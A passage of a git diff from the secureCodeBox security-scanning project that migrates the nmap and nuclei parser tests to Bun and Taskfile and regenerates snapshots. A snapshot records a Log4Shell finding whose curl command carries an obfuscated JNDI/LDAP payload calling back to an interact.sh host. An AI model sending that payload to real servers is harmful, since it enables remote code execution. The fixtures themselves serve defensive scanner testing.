allowed.\\x0D\\x0A220-Local time... - ", + " + , "script": "banner", }, "category": "FTP", @@ -525,10 +538,10 @@ test("should properly parse a script finding for ftp in an xml file", async () = test("should parse scanme.nmap.org results properly", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/scanme.nmap.org-ipv6.xml", + import.meta.dirname + "/__testFiles__/scanme.nmap.org-ipv6.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -630,13 +643,13 @@ test("should parse scanme.nmap.org results properly", async () => { test("should parse output of runs run --verbose properly", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/local-network-verbose.xml", + import.meta.dirname + "/__testFiles__/local-network-verbose.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); - await expect(validateParser(findings)).resolves.toBeUndefined(); + await validateParser(findings); expect(await parse(xmlContent)).toMatchInlineSnapshot(` [ { diff --git a/scanners/nuclei/Makefile b/scanners/nuclei/Makefile deleted file mode 100644 index c6fdefd028..0000000000 --- a/scanners/nuclei/Makefile +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = nuclei - -include ../../scanners.mk - -.PHONY: deploy-without-scanner -deploy-without-scanner: - @echo ".: 💾 Deploying '$(name)' $(scanner-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(name) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="nucleiTemplateCache.enabled=false" - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-bodgeit diff --git a/scanners/nuclei/Taskfile.yaml b/scanners/nuclei/Taskfile.yaml new file mode 100644 index 0000000000..a530451afc --- /dev/null +++ b/scanners/nuclei/Taskfile.yaml @@ -0,0 +1,87 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: nuclei + additionalHelmInstallArgsForScanner: | + --set="scanner.image.pullPolicy=IfNotPresent" \ + --set="nucleiTemplateCache.enabled=false" \ + +tasks: + predeploy: + deps: + - demo-targets:deploy:bodgeit + cmds: + - | + # create a nuclei template configmap from inline definition + cat < { const { categories, severities, count } = await scan( "nuclei-bodgeit", "nuclei", - ["-no-interactsh", "-template-id", "http-missing-security-headers,tomcat-detect", - "-u", "http://bodgeit.demo-targets.svc.cluster.local:8080"], - 180 + [ + "-no-interactsh", + "-disable-update-check", + "-templates", + "/nuclei-templates/*.yaml", + "-u", + "http://bodgeit.demo-targets.svc.cluster.local:8080", + ], + 180, + [ + { + name: "nuclei-templates", + configMap: { + name: "custom-test-nuclei-templates", + namespace: "integration-tests", + }, + }, + ], + [{ name: "nuclei-templates", mountPath: "/nuclei-templates" }], ); - expect(count).toBeGreaterThanOrEqual(10); - expect(severities["informational"]).toBeGreaterThanOrEqual(10); - expect(categories["http-missing-security-headers"]).toBeGreaterThanOrEqual(8); + expect(count).toBeGreaterThanOrEqual(1); + expect(severities["informational"]).toBeGreaterThanOrEqual(1); expect(categories["tomcat-detect"]).toBe(1); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + }, ); diff --git a/scanners/nuclei/parser/__snapshots__/parser.test.js.snap b/scanners/nuclei/parser/__snapshots__/parser.test.js.snap index fa2b763c4f..f20ba608c3 100644 --- a/scanners/nuclei/parser/__snapshots__/parser.test.js.snap +++ b/scanners/nuclei/parser/__snapshots__/parser.test.js.snap @@ -1,187 +1,7 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP +// Bun Snapshot v1, https://goo.gl/fbAQLP exports[`parses empty result correctly 1`] = `[]`; -exports[`parses ftp result correctly 1`] = ` -Array [ - Object { - "attributes": Object { - "author": null, - "extracted_results": null, - "ip": "127.0.0.1", - "matched": "www.example.com:21", - "matcher_name": null, - "metadata": Object { - "password": "default", - "username": "anonymous", - }, - "reference": null, - "tags": null, - "timestamp": "2021-08-20T22:00:48.088618+02:00", - "type": "network", - }, - "category": "ftp-default-credentials", - "description": "The name of the nuclei rule which triggered the finding: ftp-default-credentials", - "location": "www.example.com", - "name": "FTP Service with default credentials", - "severity": "HIGH", - }, - Object { - "attributes": Object { - "author": null, - "extracted_results": null, - "ip": "127.0.0.1", - "matched": "www.example.com:21", - "matcher_name": null, - "metadata": Object { - "password": "stingray", - "username": "anonymous", - }, - "reference": null, - "tags": null, - "timestamp": "2021-08-20T22:00:48.161349+02:00", - "type": "network", - }, - "category": "ftp-default-credentials", - "description": "The name of the nuclei rule which triggered the finding: ftp-default-credentials", - "location": "www.example.com", - "name": "FTP Service with default credentials", - "severity": "HIGH", - }, -] -`; - -exports[`parses log4shell result correctly 1`] = ` -[ - { - "attributes": { - "author": [ - "melbadry9", - "dhiyaneshdk", - "daffainfo", - "j12934", - ], - "curl_command": "curl -X 'GET' -d '' -H 'Host: 10.1.6.107:8080' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' -H 'X-Api-Version: \${\${::-j}\${::-n}\${::-d}\${::-i}:\${::-l}\${::-d}\${::-a}\${::-p}://\${hostName}.c70v8s2ukqds73d3ve90c8y9eheyyyyyc.interact.sh}' 'http://10.1.6.107:8080/'", - "extracted_results": [ - "vuln-log4j-vulnerable-log4j-74bbf59745-h2kqj", - ], - "hostname": "10.1.6.107", - "ip_addresses": [ - "10.1.6.107", - ], - "matched_at": "http://10.1.6.107:8080/", - "matched_line": null, - "matcher_name": null, - "matcher_status": true, - "metadata": null, - "path": null, - "reference": [ - "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", - ], - "request": null, - "response": null, - "tags": [ - "cve", - "cve2021", - "rce", - "oast", - "log4j", - ], - "template": undefined, - "template_id": "CVE-2021-44228", - "template_url": undefined, - "timestamp": "2021-12-21T15:36:21.9627479Z", - "type": "http", - }, - "category": "CVE-2021-44228", - "description": "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.", - "identified_at": "2021-12-21T15:36:21.962Z", - "location": "http://10.1.6.107:8080", - "name": "Remote code injection in Log4j", - "references": [ - { - "type": "URL", - "value": "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", - }, - { - "type": "URL", - "value": "https://www.lunasec.io/docs/blog/log4j-zero-day/", - }, - { - "type": "URL", - "value": "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", - }, - ], - "severity": "HIGH", - }, -] -`; - -exports[`parses results with requests & responses correctly 1`] = ` -[ - { - "attributes": { - "author": [ - "pdteam", - ], - "curl_command": "curl -X 'OPTIONS' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36' 'https://example.com'", - "extracted_results": [ - "OPTIONS, GET, HEAD, POST", - ], - "hostname": "example.com", - "ip_addresses": [ - "93.184.216.34", - ], - "matched_at": "https://example.com", - "matched_line": null, - "matcher_name": null, - "matcher_status": true, - "metadata": null, - "path": null, - "reference": null, - "request": "OPTIONS / HTTP/1.1 -Host: example.com -User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 -Connection: close -Accept: */* -Accept-Language: en -Accept-Encoding: gzip - -", - "response": "HTTP/1.1 200 OK -Connection: close -Allow: OPTIONS, GET, HEAD, POST -Cache-Control: max-age=604800 -Content-Type: text/html; charset=UTF-8 -Date: Fri, 09 Sep 2022 19:56:16 GMT -Expires: Fri, 16 Sep 2022 19:56:16 GMT -Server: EOS (vny/0454) -Content-Length: 0 - -", - "tags": [ - "misc", - "generic", - ], - "template": "miscellaneous/options-method.yaml", - "template_id": "options-method", - "template_url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/miscellaneous/options-method.yaml", - "timestamp": "2022-09-09T21:56:16.141265+02:00", - "type": "http", - }, - "category": "options-method", - "description": "The name of the nuclei rule which triggered the finding: options-method", - "identified_at": "2022-09-09T19:56:16.141Z", - "location": "https://example.com", - "name": "Allowed Options Method", - "references": null, - "severity": "INFORMATIONAL", - }, -] -`; - exports[`parses secureCodeBox.io result correctly 1`] = ` [ { @@ -354,8 +174,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -399,8 +221,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -444,8 +268,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -489,8 +315,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -534,8 +362,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.645Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -579,8 +409,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.645Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -624,8 +456,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.655Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -669,8 +503,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -714,8 +550,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -759,8 +597,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -804,8 +644,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -849,8 +691,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -894,8 +738,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -939,8 +785,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -984,8 +832,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -1029,8 +879,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -1216,8 +1068,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.271Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1261,8 +1115,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1306,8 +1162,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1351,8 +1209,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1396,8 +1256,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1441,8 +1303,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1486,8 +1350,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.292Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1531,8 +1397,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1576,8 +1444,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1621,8 +1491,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1666,8 +1538,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1711,8 +1585,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1756,8 +1632,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1801,8 +1679,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1846,8 +1726,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1891,8 +1773,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1936,8 +1820,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.294Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -2067,8 +1953,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "ssl", }, "category": "deprecated-tls", - "description": "Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. -", + "description": +"Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. +" +, "identified_at": "2022-09-09T19:20:23.432Z", "location": "https://example.com", "name": "Deprecated TLS Detection (TLS 1.1 or SSLv3)", @@ -2117,8 +2005,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "ssl", }, "category": "deprecated-tls", - "description": "Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. -", + "description": +"Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. +" +, "identified_at": "2022-09-09T19:20:23.731Z", "location": "https://example.com", "name": "Deprecated TLS Detection (TLS 1.1 or SSLv3)", @@ -2435,3 +2325,138 @@ exports[`parses the example.com result correctly 1`] = ` }, ] `; + +exports[`parses log4shell result correctly 1`] = ` +[ + { + "attributes": { + "author": [ + "melbadry9", + "dhiyaneshdk", + "daffainfo", + "j12934", + ], + "curl_command": "curl -X 'GET' -d '' -H 'Host: 10.1.6.107:8080' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' -H 'X-Api-Version: \${\${::-j}\${::-n}\${::-d}\${::-i}:\${::-l}\${::-d}\${::-a}\${::-p}://\${hostName}.c70v8s2ukqds73d3ve90c8y9eheyyyyyc.interact.sh}' 'http://10.1.6.107:8080/'", + "extracted_results": [ + "vuln-log4j-vulnerable-log4j-74bbf59745-h2kqj", + ], + "hostname": "10.1.6.107", + "ip_addresses": [ + "10.1.6.107", + ], + "matched_at": "http://10.1.6.107:8080/", + "matched_line": null, + "matcher_name": null, + "matcher_status": true, + "metadata": null, + "path": null, + "reference": [ + "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", + ], + "request": null, + "response": null, + "tags": [ + "cve", + "cve2021", + "rce", + "oast", + "log4j", + ], + "template": undefined, + "template_id": "CVE-2021-44228", + "template_url": undefined, + "timestamp": "2021-12-21T15:36:21.9627479Z", + "type": "http", + }, + "category": "CVE-2021-44228", + "description": "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.", + "identified_at": "2021-12-21T15:36:21.962Z", + "location": "http://10.1.6.107:8080", + "name": "Remote code injection in Log4j", + "references": [ + { + "type": "URL", + "value": "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", + }, + { + "type": "URL", + "value": "https://www.lunasec.io/docs/blog/log4j-zero-day/", + }, + { + "type": "URL", + "value": "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", + }, + ], + "severity": "HIGH", + }, +] +`; + +exports[`parses results with requests & responses correctly 1`] = ` +[ + { + "attributes": { + "author": [ + "pdteam", + ], + "curl_command": "curl -X 'OPTIONS' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36' 'https://example.com'", + "extracted_results": [ + "OPTIONS, GET, HEAD, POST", + ], + "hostname": "example.com", + "ip_addresses": [ + "93.184.216.34", + ], + "matched_at": "https://example.com", + "matched_line": null, + "matcher_name": null, + "matcher_status": true, + "metadata": null, + "path": null, + "reference": null, + "request": +"OPTIONS / HTTP/1.1 +Host: example.com +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 +Connection: close +Accept: */* +Accept-Language: en +Accept-Encoding: gzip + +" +, + "response": +"HTTP/1.1 200 OK +Connection: close +Allow: OPTIONS, GET, HEAD, POST +Cache-Control: max-age=604800 +Content-Type: text/html; charset=UTF-8 +Date: Fri, 09 Sep 2022 19:56:16 GMT +Expires: Fri, 16 Sep 2022 19:56:16 GMT +Server: EOS (vny/0454) +Content-Length: 0 + +" +, + "tags": [ + "misc", + "generic", + ], + "template": "miscellaneous/options-method.yaml", + "template_id": "options-method", + "template_url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/miscellaneous/options-method.yaml", + "timestamp": "2022-09-09T21:56:16.141265+02:00", + "type": "http", + }, + "category": "options-method", + "description": "The name of the nuclei rule which triggered the finding: options-method", + "identified_at": "2022-09-09T19:56:16.141Z", + "location": "https://example.com", + "name": "Allowed Options Method", + "references": null, + "severity": "INFORMATIONAL", + }, +] +`; diff --git a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl b/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl deleted file mode 100644 index cd1491b957..0000000000 --- a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl +++ /dev/null @@ -1,2 +0,0 @@ -{"templateID":"ftp-default-credentials","info":{"severity":"critical","tags":"network,ftp,default-login","name":"FTP Service with default credentials","author":"pussycat0x"},"type":"network","host":"www.example.com","matched":"www.example.com:21","meta":{"password":"default","username":"anonymous"},"ip":"127.0.0.1","timestamp":"2021-08-20T22:00:48.088618+02:00"} -{"templateID":"ftp-default-credentials","info":{"tags":"network,ftp,default-login","name":"FTP Service with default credentials","author":"pussycat0x","severity":"critical"},"type":"network","host":"www.example.com","matched":"www.example.com:21","meta":{"password":"stingray","username":"anonymous"},"ip":"127.0.0.1","timestamp":"2021-08-20T22:00:48.161349+02:00"} diff --git a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license b/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/nuclei/parser/package-lock.json b/scanners/nuclei/parser/package-lock.json deleted file mode 100644 index fe8dce1077..0000000000 --- a/scanners/nuclei/parser/package-lock.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "@securecodebox/parser-nuclei", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-nuclei", - "version": "1.0.0", - "license": "Apache-2.0", - "devDependencies": {} - } - } -} diff --git a/scanners/nuclei/parser/package-lock.json.license b/scanners/nuclei/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/nuclei/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/nuclei/parser/package.json b/scanners/nuclei/parser/package.json deleted file mode 100644 index e99146c1ea..0000000000 --- a/scanners/nuclei/parser/package.json +++ /dev/null @@ -1,11 +0,0 @@ -{ - "name": "@securecodebox/parser-nuclei", - "version": "1.0.0", - "description": "Parses result files for the type: 'nuclei-jsonl'.", - "main": "", - "scripts": {}, - "keywords": [], - "author": "iteratec GmbH", - "license": "Apache-2.0", - "devDependencies": {} -} diff --git a/scanners/nuclei/parser/package.json.license b/scanners/nuclei/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/nuclei/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/nuclei/parser/parser.js b/scanners/nuclei/parser/parser.js index 46c6631949..70afd5fc44 100644 --- a/scanners/nuclei/parser/parser.js +++ b/scanners/nuclei/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { // Only 0 when the target wasn't reachable if (fileContent.length === 0) { return []; @@ -12,43 +12,45 @@ async function parse(fileContent) { return jsonResult.map((finding) => { const hostname = parseHostname(finding.host); - // Add reference URLs to the references array - const urlReferences = finding.info.reference ? 